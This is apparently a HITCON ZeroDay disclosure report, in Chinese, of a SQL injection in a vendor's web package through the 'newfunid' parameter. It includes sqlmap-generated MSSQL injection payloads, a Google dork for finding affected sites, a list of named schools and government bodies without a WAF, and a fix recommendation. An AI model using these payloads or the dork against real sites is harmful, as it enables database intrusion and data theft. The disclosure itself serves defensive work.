網韻資訊股份有限公司網頁套件 SQL injecion

Vulnerability Overview

ZDID: ZD-2017-01132
發信 Vendor: 網韻資訊股份有限公司
Title: 網韻資訊股份有限公司網頁套件 SQL injecion
Introduction: 藉由手機版介面的參數進行注入

處理狀態

目前狀態

公開

Last Update : 2018/01/29

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2017/11/30 21:20:40 : 新提交 (由 meowmeowmeow 更新此狀態)
2017/11/30 21:22:10 : 新提交 (由 meowmeowmeow 更新此狀態)
2017/11/30 21:23:09 : 新提交 (由 meowmeowmeow 更新此狀態)
2017/11/30 21:27:07 : 新提交 (由 meowmeowmeow 更新此狀態)
2017/12/01 11:25:34 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2017/12/25 10:50:57 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2017/12/25 10:50:58 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2017/12/25 10:50:58 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2017/12/29 12:24:03 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2017/12/29 12:24:03 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/01/26 02:54:39 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/01/26 02:58:40 : 確認已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/01/29 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2017-01132
通報者：racterub (meowmeowmeow)
風險：中
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

在 newfunid 參數使用單引號後會回傳 SQL 錯誤訊息,
(錯誤訊息: )

利用 SQLmap 可以進行注入並取得資料庫
Exploit:

Parameter: newfunid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: m=ntpc_mobile&newfunid=(SELECT (CASE WHEN (4746=4746) THEN 4746 ELSE 4746*(SELECT 4746 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: m=ntpc_mobile&newfunid=8 AND 6793=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6793=6793) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: m=ntpc_mobile&newfunid=(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2599=2599) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: m=ntpc_mobile&newfunid=8 OR 1942=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: m=ntpc_mobile&newfunid=8 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(85)+CHAR(108)+CHAR(97)+CHAR(102)+CHAR(77)+CHAR(84)+CHAR(121)+CHAR(114)+CHAR(71)+CHAR(108)+CHAR(70)+CHAR(78)+CHAR(68)+CHAR(107)+CHAR(110)+CHAR(111)+CHAR(120)+CHAR(113)+CHAR(85)+CHAR(69)+CHAR(104)+CHAR(120)+CHAR(77)+CHAR(72)+CHAR(97)+CHAR(113)+CHAR(105)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(88)+CHAR(120)+CHAR(88)+CHAR(107)+CHAR(104)+CHAR(118)+CHAR(71)+CHAR(118)+CHAR(70)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- -

利用 Google Hacking 可發現有許多政府機關以及教育機構有使用該套件, 並且大多都沒加裝 WAF, 導致資訊洩出和注入

(Google Hacking: inurl:cmprmise inurl:newfunid )

未加裝 WAF 名單:
福建省政府
裕鼎股份
中埔國小
瑞光國小
東新國小
天外天焚化廠
臺中港務警察總隊
倫鼎股份
板橋國中
瑞濱國小
竹光國中
台東大學實驗小學

其餘大多有加裝 WAF 或是直接回傳 500

修補建議

Parameterized Queries (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet)
並鼓勵政府機關和教育機構加裝 WAF

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

網韻資訊股份有限公司網頁套件 SQL injecion - HITCON ZeroDay

Vulnerability Detail Report